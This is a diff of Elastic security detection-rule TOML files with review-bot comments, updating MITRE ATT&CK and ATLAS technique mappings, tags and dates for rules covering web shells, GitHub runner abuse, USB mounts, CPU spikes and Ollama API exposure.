= "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/cross-platform/execution_sap_netweaver_jsp_webshell.toml b/rules/cross-platform/execution_sap_netweaver_jsp_webshell.toml index a9a731ace09..143cd14ba11 100644 --- a/rules/cross-platform/execution_sap_netweaver_jsp_webshell.toml +++ b/rules/cross-platform/execution_sap_netweaver_jsp_webshell.toml 
@@ -2,7 +2,7 @@ creation_date = "2025/04/26" integration = ["endpoint"] maturity = "production" -updated_date = "2025/04/26" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -21,16 +21,7 @@ references = [ risk_score = 73 rule_id = "f7d588ba-e4b0-442e-879d-7ec39fbd69c5" severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Execution", - "Use Case: Vulnerability", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "OS: Windows", "Use Case: Threat Detection", "Use Case: Vulnerability", "Tactic: Persistence", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -67,24 +58,18 @@ note = """## Triage and analysis [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" -[[rule.threat.technique.subtechnique]] -id = "T1059.007" -name = "JavaScript" -reference = "https://attack.mitre.org/techniques/T1059/007/" - [[rule.threat.technique]] -id = "T1203" -name = "Exploitation for Client Execution" -reference = "https://attack.mitre.org/techniques/T1203/" +id = "T1505" +name = "Server Software Component" +reference = "https://attack.mitre.org/techniques/T1505/" +[[rule.threat.technique.subtechnique]] +id = "T1505.003" +name = "Web Shell" +reference = "https://attack.mitre.org/techniques/T1505/003/" [rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/cross-platform/execution_sap_netweaver_webshell_exec.toml b/rules/cross-platform/execution_sap_netweaver_webshell_exec.toml index ac4891f7ad4..da67ad548c5 100644 
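Review bot: The only tactic for `execution_sap_netweaver_jsp_webshell.toml` is now `Persistence` (`T1505.003`), yet the file keeps its `execution_` prefix; if the repository's file-name prefix is meant to mirror the primary tactic, the file should be renamed, otherwise a note in the description that the prefix is historical avoids confusion for maintainers. The move from `T1059.007` / `T1203` to `T1505.003` Web Shell is a closer fit for a JSP web shell and needs no further change.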
--- a/rules/cross-platform/execution_sap_netweaver_webshell_exec.toml +++ b/rules/cross-platform/execution_sap_netweaver_webshell_exec.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/26" integration = ["endpoint"] maturity = "production" -updated_date = "2025/04/26" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -21,16 +21,7 @@ references = [ risk_score = 73 rule_id = "23c53c4c-aa8b-4b07-85c0-fe46a9c8acaf" severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Execution", - "Use Case: Vulnerability", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "OS: Windows", "Use Case: Threat Detection", "Use Case: Vulnerability", "Tactic: Execution", "Tactic: Initial Access", "Tactic: Persistence", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" 
@@ -84,24 +75,64 @@ note = """## Triage and analysis [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] -id = "T1059.007" -name = "JavaScript" -reference = "https://attack.mitre.org/techniques/T1059/007/" +id = "T1059.001" +name = "PowerShell" +reference = "https://attack.mitre.org/techniques/T1059/001/" +[[rule.threat.technique.subtechnique]] +id = "T1059.003" +name = "Windows Command Shell" +reference = "https://attack.mitre.org/techniques/T1059/003/" -[[rule.threat.technique]] -id = "T1203" -name = "Exploitation for Client Execution" -reference = "https://attack.mitre.org/techniques/T1203/" +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" +[[rule.threat.technique.subtechnique]] +id = "T1059.006" +name = "Python" +reference = "https://attack.mitre.org/techniques/T1059/006/" [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1190" +name = "Exploit Public-Facing Application" +reference = "https://attack.mitre.org/techniques/T1190/" + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1505" +name = "Server Software Component" +reference = "https://attack.mitre.org/techniques/T1505/" + +[[rule.threat.technique.subtechnique]] +id = "T1505.003" +name = "Web Shell" +reference = "https://attack.mitre.org/techniques/T1505/003/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" 
diff --git a/rules/cross-platform/execution_suspicious_java_netcon_childproc.toml b/rules/cross-platform/execution_suspicious_java_netcon_childproc.toml index 8ca0cdb5a1f..b204ba78215 100644 --- a/rules/cross-platform/execution_suspicious_java_netcon_childproc.toml +++ b/rules/cross-platform/execution_suspicious_java_netcon_childproc.toml @@ -2,7 +2,7 @@ creation_date = "2021/12/10" integration = ["endpoint"] maturity = "production" -updated_date = "2025/01/27" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -26,16 +26,7 @@ references = [ risk_score = 73 rule_id = "c3f5e1d8-910e-43b4-8d44-d748e498ca86" severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "OS: macOS", - "Use Case: Threat Detection", - "Tactic: Execution", - "Use Case: Vulnerability", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "OS: macOS", "Use Case: Threat Detection", "Use Case: Vulnerability", "Tactic: Execution", "Tactic: Initial Access", "Data Source: Elastic Defend", "Resources: Investigation Guide"] type = "eql" query = ''' 
@@ -109,24 +100,31 @@ Java Naming and Directory Interface (JNDI) is a Java API that provides naming an [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" -[[rule.threat.technique.subtechnique]] -id = "T1059.007" -name = "JavaScript" -reference = "https://attack.mitre.org/techniques/T1059/007/" - - -[[rule.threat.technique]] -id = "T1203" -name = "Exploitation for Client Execution" -reference = "https://attack.mitre.org/techniques/T1203/" +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1190" +name = "Exploit Public-Facing Application" +reference = "https://attack.mitre.org/techniques/T1190/" + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" diff --git a/rules/cross-platform/execution_via_github_actions_runner.toml b/rules/cross-platform/execution_via_github_actions_runner.toml index 08782e87f48..970fad9a796 100644 --- a/rules/cross-platform/execution_via_github_actions_runner.toml +++ b/rules/cross-platform/execution_via_github_actions_runner.toml @@ -2,7 +2,7 @@ creation_date = "2025/11/26" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike", "auditd_manager"] maturity = "production" -updated_date = "2025/11/26" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -65,24 +65,7 @@ references = [ risk_score = 47 rule_id = "a640ef5b-e1da-4b17-8391-468fdbd1b517" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "OS: Windows", - "OS: macOS", - "Use Case: Threat Detection", - "Tactic: Execution", - "Tactic: Initial Access", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Windows Security Event Logs", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: Sysmon", - "Data Source: SentinelOne", - "Data Source: Crowdstrike", - "Data Source: Auditd Manager", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "OS: Windows", "OS: macOS", "Use Case: Threat Detection", "Tactic: Execution", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Data Source: Auditd Manager", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" 
@@ -99,32 +82,48 @@ process where event.type == "start" and event.action in ("exec", "exec_event", " [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique.subtechnique]] +id = "T1059.001" +name = "PowerShell" +reference = "https://attack.mitre.org/techniques/T1059/001/" +[[rule.threat.technique.subtechnique]] +id = "T1059.002" +name = "AppleScript" +reference = "https://attack.mitre.org/techniques/T1059/002/" -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1195" -name = "Supply Chain Compromise" -reference = "https://attack.mitre.org/techniques/T1195/" [[rule.threat.technique.subtechnique]] -id = "T1195.002" -name = "Compromise Software Supply Chain" -reference = "https://attack.mitre.org/techniques/T1195/002/" +id = "T1059.003" +name = "Windows Command Shell" +reference = "https://attack.mitre.org/techniques/T1059/003/" +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" +[[rule.threat.technique.subtechnique]] +id = "T1059.006" +name = "Python" +reference = "https://attack.mitre.org/techniques/T1059/006/" -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat.technique.subtechnique]] +id = "T1059.007" +name = "JavaScript" +reference = "https://attack.mitre.org/techniques/T1059/007/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.011" +name = "Lua" +reference = "https://attack.mitre.org/techniques/T1059/011/" +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" 
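Review bot: The `T1059` entry now lists seven sub-techniques (`.001`, `.002`, `.003`, `.004`, `.006`, `.007`, `.011`), including AppleScript, JavaScript and Lua; the query is outside the hunk, so if it only matches shell and PowerShell children of the runner this over-maps and inflates coverage reports. Keep only the interpreters the query actually matches, or add a comment such as `# sub-techniques mirror the interpreter list in the query` so the breadth can be verified. The sibling registration rule (hunk ending at L77) dropped `T1059` entirely, so the two runner rules now map execution differently; confirm that split is intended.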
diff --git a/rules/cross-platform/execution_via_github_runner_with_runner_tracking_id_tampering_via_env_vars.toml b/rules/cross-platform/execution_via_github_runner_with_runner_tracking_id_tampering_via_env_vars.toml index ebd0cb49ce7..65d688cfd2b 100644 --- a/rules/cross-platform/execution_via_github_runner_with_runner_tracking_id_tampering_via_env_vars.toml +++ b/rules/cross-platform/execution_via_github_runner_with_runner_tracking_id_tampering_via_env_vars.toml @@ -2,7 +2,7 @@ creation_date = "2025/11/27" integration = ["endpoint"] maturity = "production" -updated_date = "2025/11/27" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -93,17 +93,7 @@ After saving the integration change, the Elastic Agents running this policy will For more information on capturing environment variables refer to the [helper guide](https://www.elastic.co/guide/en/security/current/environment-variable-capture.html). """ severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "OS: macOS", - "Use Case: Threat Detection", - "Tactic: Execution", - "Tactic: Initial Access", - "Tactic: Defense Evasion", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "OS: macOS", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' 
@@ -115,49 +105,17 @@ not process.env_vars like~ "RUNNER_TRACKING_ID=github_*" [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Execution" - id = "TA0002" - reference = "https://attack.mitre.org/tactics/TA0002/" - - [[rule.threat.technique]] - id = "T1059" - name = "Command and Scripting Interpreter" - reference = "https://attack.mitre.org/techniques/T1059/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - - [rule.threat.tactic] - name = "Initial Access" - id = "TA0001" - reference = "https://attack.mitre.org/tactics/TA0001/" - - [[rule.threat.technique]] - name = "Supply Chain Compromise" - id = "T1195" - reference = "https://attack.mitre.org/techniques/T1195/" - - [[rule.threat.technique.subtechnique]] - name = "Compromise Software Dependencies and Development Tools" - id = "T1195.001" - reference = "https://attack.mitre.org/techniques/T1195/001/" - - -[[rule.threat]] -framework = "MITRE ATT&CK" - - [rule.threat.tactic] - name = "Defense Evasion" - id = "TA0005" - reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat.technique]] +id = "T1562" +name = "Impair Defenses" +reference = "https://attack.mitre.org/techniques/T1562/" - [[rule.threat.technique]] - name = "Impair Defenses" - id = "T1562" - reference = "https://attack.mitre.org/techniques/T1562/" +[[rule.threat.technique.subtechnique]] +id = "T1562.001" +name = "Disable or Modify Tools" +reference = "https://attack.mitre.org/techniques/T1562/001/" - [[rule.threat.technique.subtechnique]] - name = "Disable or Modify Tools" - id = "T1562.001" - reference = "https://attack.mitre.org/techniques/T1562/001/" +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/cross-platform/impact_alert_from_a_process_with_cpu_spike.toml b/rules/cross-platform/impact_alert_from_a_process_with_cpu_spike.toml index a0c85693771..3d12517555c 100644 
--- a/rules/cross-platform/impact_alert_from_a_process_with_cpu_spike.toml +++ b/rules/cross-platform/impact_alert_from_a_process_with_cpu_spike.toml @@ -1,7 +1,7 @@ [metadata] creation_date = "2026/01/26" maturity = "production" -updated_date = "2026/03/09" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -125,10 +125,3 @@ post-compromise activity. - Monitor the environment for recurrence of similar high-CPU processes combined with security alerts. - Escalate the incident if multiple hosts or indicators suggest coordinated or widespread activity.""" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0040" -name = "Impact" -reference = "https://attack.mitre.org/tactics/TA0040/" diff --git a/rules/cross-platform/impact_alerts_on_host_with_cpu_spike.toml b/rules/cross-platform/impact_alerts_on_host_with_cpu_spike.toml index a62746b856a..814bf8f4631 100644 --- a/rules/cross-platform/impact_alerts_on_host_with_cpu_spike.toml +++ b/rules/cross-platform/impact_alerts_on_host_with_cpu_spike.toml @@ -1,7 +1,7 @@ [metadata] creation_date = "2026/01/26" maturity = "production" -updated_date = "2026/02/26" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -127,6 +127,16 @@ within a short time window. This combination may indicate malicious execution, r [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1496" +name = "Resource Hijacking" +reference = "https://attack.mitre.org/techniques/T1496/" + +[[rule.threat.technique.subtechnique]] +id = "T1496.001" +name = "Compute Hijacking" +reference = "https://attack.mitre.org/techniques/T1496/001/" + [rule.threat.tactic] id = "TA0040" name = "Impact" diff --git a/rules/cross-platform/initial_access_azure_o365_with_network_alert.toml b/rules/cross-platform/initial_access_azure_o365_with_network_alert.toml index 0c42ed1077a..7f45c3c1b83 100644 --- a/rules/cross-platform/initial_access_azure_o365_with_network_alert.toml 
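Review bot: The two CPU-spike correlation rules diverge: `impact_alert_from_a_process_with_cpu_spike.toml` loses its `Impact` mapping entirely, while `impact_alerts_on_host_with_cpu_spike.toml` gains `T1496.001` Compute Hijacking under the same tactic. No tags hunk for the first file is in the diff, so a `Tactic: Impact` tag there (tags block outside the hunk) would be left without a backing entry. Mapping both rules to `T1496.001` keeps them consistent; if the removal is intentional it deserves a sentence in the commit description.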
+++ b/rules/cross-platform/initial_access_azure_o365_with_network_alert.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/29" integration = ["azure", "o365"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -59,20 +59,7 @@ The Azure Fleet integration, Office 365 Logs Fleet integration, Filebeat module, risk_score = 73 rule_id = "f0cc239b-67fa-46fc-89d4-f861753a40f5" severity = "high" -tags = [ - "Domain: Cloud", - "Domain: SaaS", - "Data Source: Azure", - "Data Source: Entra ID", - "Data Source: Entra ID Sign-in Logs", - "Data Source: Microsoft 365", - "Data Source: Microsoft 365 Audit Logs", - "Use Case: Identity and Access Audit", - "Use Case: Threat Detection", - "Tactic: Initial Access", - "Resources: Investigation Guide", - "Rule Type: Higher-Order Rule", -] +tags = ["Domain: Cloud", "Domain: SaaS", "Tactic: Collection", "Tactic: Initial Access", "Data Source: Azure", "Data Source: Entra ID", "Data Source: Entra ID Sign-in Logs", "Data Source: Microsoft 365", "Data Source: Microsoft 365 Audit Logs", "Use Case: Identity and Access Audit", "Use Case: Threat Detection", "Resources: Investigation Guide", "Rule Type: Higher-Order Rule"] timestamp_override = "event.ingested" type = "esql" 
@@ -124,14 +111,36 @@ from logs-o365.audit-*, logs-azure.signinlogs-*, .alerts-security.* [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1114" +name = "Email Collection" +reference = "https://attack.mitre.org/techniques/T1114/" + +[[rule.threat.technique.subtechnique]] +id = "T1114.002" +name = "Remote Email Collection" +reference = "https://attack.mitre.org/techniques/T1114/002/" + +[rule.threat.tactic] +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" - diff --git a/rules/cross-platform/initial_access_elastic_defend_alert_genai_utility_descendant.toml b/rules/cross-platform/initial_access_elastic_defend_alert_genai_utility_descendant.toml index 9bf079851a4..a3a7976428f 100644 --- a/rules/cross-platform/initial_access_elastic_defend_alert_genai_utility_descendant.toml +++ b/rules/cross-platform/initial_access_elastic_defend_alert_genai_utility_descendant.toml @@ -3,7 +3,7 @@ creation_date = "2026/02/27" maturity = "production" min_stack_comments = "ES|QL inline stats became generally available in 9.3.0 and MV_INTERSECTION is in preview since 9.3." min_stack_version = "9.3.0" -updated_date = "2026/02/27" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -96,18 +96,3 @@ FROM logs-endpoint.alerts-*, logs-endpoint.events.process-* metadata _id, _versi | KEEP * ''' -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1195" -name = "Supply Chain Compromise" -reference = "https://attack.mitre.org/techniques/T1195/" -[[rule.threat.technique.subtechnique]] -id = "T1195.002" -name = "Compromise Software Supply Chain" -reference = "https://attack.mitre.org/techniques/T1195/002/" - -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" diff --git a/rules/cross-platform/initial_access_execution_susp_react_serv_child.toml b/rules/cross-platform/initial_access_execution_susp_react_serv_child.toml index bfb7916cda2..4ec8cccbe6a 100644 --- a/rules/cross-platform/initial_access_execution_susp_react_serv_child.toml +++ b/rules/cross-platform/initial_access_execution_susp_react_serv_child.toml @@ -2,7 +2,7 @@ creation_date = "2025/12/04" integration = ["endpoint", "windows", "auditd_manager", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/19" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -61,19 +61,7 @@ references = [ risk_score = 73 rule_id = "ae3e9625-89ad-4fc3-a7bf-fced5e64f01b" severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "OS: macOS", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Initial Access", - "Data Source: Elastic Defend", - "Data Source: Auditd Manager", - "Data Source: SentinelOne", - "Data Source: Sysmon", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "OS: macOS", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Initial Access", "Data Source: Elastic Defend", "Data Source: Auditd Manager", "Data Source: SentinelOne", "Data Source: Sysmon", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' 
@@ -118,6 +106,19 @@ and ( [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1190" name = "Exploit Public-Facing Application" diff --git a/rules/cross-platform/initial_access_exfiltration_new_usb_device_mounted.toml b/rules/cross-platform/initial_access_exfiltration_new_usb_device_mounted.toml index dbee870beb8..38047bc5492 100644 --- a/rules/cross-platform/initial_access_exfiltration_new_usb_device_mounted.toml +++ b/rules/cross-platform/initial_access_exfiltration_new_usb_device_mounted.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "Device mount events were added as part of the Elastic Defend Device Control feature." min_stack_version = "9.2.0" -updated_date = "2025/11/11" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -60,17 +60,7 @@ references = [ risk_score = 21 rule_id = "483832a8-ffdd-4e11-8e96-e0224f7bda9b" severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "OS: macOS", - "Use Case: Threat Detection", - "Use Case: Device Control", - "Tactic: Initial Access", - "Tactic: Exfiltration", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "OS: macOS", "Use Case: Threat Detection", "Use Case: Device Control", "Tactic: Exfiltration", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "new_terms" 
@@ -81,34 +71,21 @@ host.os.type:(macos or windows) and event.type:device and event.action:mount and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1091" -name = "Replication Through Removable Media" -reference = "https://attack.mitre.org/techniques/T1091/" - -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1052" name = "Exfiltration Over Physical Medium" reference = "https://attack.mitre.org/techniques/T1052/" + [[rule.threat.technique.subtechnique]] id = "T1052.001" name = "Exfiltration over USB" reference = "https://attack.mitre.org/techniques/T1052/001/" - - [rule.threat.tactic] id = "TA0010" name = "Exfiltration" reference = "https://attack.mitre.org/tactics/TA0010/" - [rule.new_terms] field = "new_terms_fields" value = ["device.serial_number", "host.id"] diff --git a/rules/cross-platform/initial_access_fortigate_ssl_vpn_login_followed_by_siem_alert.toml b/rules/cross-platform/initial_access_fortigate_ssl_vpn_login_followed_by_siem_alert.toml index 1b1b7304706..378b3ca7c56 100644 --- a/rules/cross-platform/initial_access_fortigate_ssl_vpn_login_followed_by_siem_alert.toml +++ b/rules/cross-platform/initial_access_fortigate_ssl_vpn_login_followed_by_siem_alert.toml @@ -2,7 +2,7 @@ creation_date = "2026/02/20" integration = ["fortinet_fortigate"] maturity = "production" -updated_date = "2026/03/09" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
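Review bot: Dropping `T1091` Replication Through Removable Media removes the Initial Access side of a detection that fires on a new USB device mount; a mount event on its own evidences the device's arrival at least as much as exfiltration (`T1052.001`), which would additionally require data written to it. If the rule is meant to cover both directions, keep the `T1091` / `TA0001` entry and the `Tactic: Initial Access` tag removed in the hunk ending at L92; if not, the rule description should say why only exfiltration is mapped.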
@@ -68,13 +68,18 @@ This rule correlates a FortiGate SSL VPN login with a subsequent security alert
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1078"
 name = "Valid Accounts"
 reference = "https://attack.mitre.org/techniques/T1078/"
+[[rule.threat.technique]]
+id = "T1133"
+name = "External Remote Services"
+reference = "https://attack.mitre.org/techniques/T1133/"
 [rule.threat.tactic]
 id = "TA0001"
 name = "Initial Access"
-reference = "https://attack.mitre.org/tactics/TA0001/"
\ No newline at end of file
+reference = "https://attack.mitre.org/tactics/TA0001/"
diff --git a/rules/cross-platform/initial_access_ollama_api_external_access.toml b/rules/cross-platform/initial_access_ollama_api_external_access.toml
index 4a059992f9c..0219cc53c21 100644
--- a/rules/cross-platform/initial_access_ollama_api_external_access.toml
+++ b/rules/cross-platform/initial_access_ollama_api_external_access.toml
@@ -2,7 +2,7 @@ creation_date = "2026/01/09"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2026/01/09"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -51,19 +51,7 @@ references = [
 risk_score = 47
 rule_id = "d8f2a1b3-c4e5-6789-abcd-ef0123456789"
 severity = "medium"
-tags = [
-    "Domain: Endpoint",
-    "OS: Linux",
-    "OS: macOS",
-    "OS: Windows",
-    "Use Case: Threat Detection",
-    "Tactic: Initial Access",
-    "Data Source: Elastic Defend",
-    "Resources: Investigation Guide",
-    "Domain: LLM",
-    "Mitre Atlas: T0040",
-    "Mitre Atlas: T0044",
-]
+tags = ["Domain: Endpoint", "OS: Linux", "OS: macOS", "OS: Windows", "Use Case: Threat Detection", "Tactic: Initial Access", "Tactic: AI Model Access", "Data Source: Elastic Defend", "Resources: Investigation Guide", "Domain: LLM", "Mitre Atlas: T0040", "Mitre Atlas: T0044"]
 timestamp_override = "event.ingested"
 type = "eql"
@@ -89,14 +77,26 @@ network where event.action == "connection_accepted" and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1190"
 name = "Exploit Public-Facing Application"
 reference = "https://attack.mitre.org/techniques/T1190/"
-
 [rule.threat.tactic]
 id = "TA0001"
 name = "Initial Access"
 reference = "https://attack.mitre.org/tactics/TA0001/"
+[[rule.threat]]
+framework = "MITRE ATLAS"
+
+[[rule.threat.technique]]
+id = "AML.T0040"
+name = "AI Model Inference API Access"
+reference = "https://atlas.mitre.org/techniques/AML.T0040/"
+
+[rule.threat.tactic]
+id = "AML.TA0000"
+name = "AI Model Access"
+reference = "https://atlas.mitre.org/tactics/AML.TA0000/"
diff --git a/rules/cross-platform/initial_access_zoom_meeting_with_no_passcode.toml b/rules/cross-platform/initial_access_zoom_meeting_with_no_passcode.toml
index 6772035224b..ae3136dc37d 100644
--- a/rules/cross-platform/initial_access_zoom_meeting_with_no_passcode.toml
+++ b/rules/cross-platform/initial_access_zoom_meeting_with_no_passcode.toml
@@ -1,7 +1,7 @@
 [metadata]
 creation_date = "2020/09/14"
 maturity = "production"
-updated_date = "2025/01/15"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -70,16 +70,3 @@ Zoom meetings without passcodes are vulnerable to unauthorized access, known as
 - Coordinate with the communications team to prepare a response plan for any potential public relations issues arising from the incident, ensuring clear and consistent messaging."""
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1190"
-name = "Exploit Public-Facing Application"
-reference = "https://attack.mitre.org/techniques/T1190/"
-
-
-[rule.threat.tactic]
-id = "TA0001"
-name = "Initial Access"
-reference = "https://attack.mitre.org/tactics/TA0001/"
-
diff --git a/rules/cross-platform/multiple_alerts_by_host_ip_and_source_ip.toml b/rules/cross-platform/multiple_alerts_by_host_ip_and_source_ip.toml
index c6700035c99..6f18ddb3bfa 100644
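Review bot: The tags hunk above keeps `"Mitre Atlas: T0044"`, but the ATLAS `[[rule.threat]]` entry added here maps only `AML.T0040`, so T0044 is now tagged with no corresponding technique in `rule.threat`. Either add a second `[[rule.threat.technique]]` under the same `AML.TA0000` tactic with `id = "AML.T0044"` plus its ATLAS name and `https://atlas.mitre.org/techniques/AML.T0044/` reference, or drop the tag so the two lists agree. The tag spelling (`T0040`, without the `AML.` prefix used in the threat ids) also makes it harder to grep one against the other; if the tag format is fixed by convention elsewhere, a one-line comment in the description noting that the prefix is implied would help the next maintainer.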
--- a/rules/cross-platform/multiple_alerts_by_host_ip_and_source_ip.toml
+++ b/rules/cross-platform/multiple_alerts_by_host_ip_and_source_ip.toml
@@ -1,7 +1,7 @@
 [metadata]
 creation_date = "2025/12/31"
 maturity = "production"
-updated_date = "2026/02/16"
+updated_date = "2026/03/23"
 [rule]
@@ -27,7 +27,7 @@ If you are using **Elastic Defend**, ensure host IP collection is enabled by fol
 [helper guide](https://www.elastic.co/docs/solutions/security/configure-elastic-defend/configure-data-volume-for-elastic-endpoint#host-fields).
 """
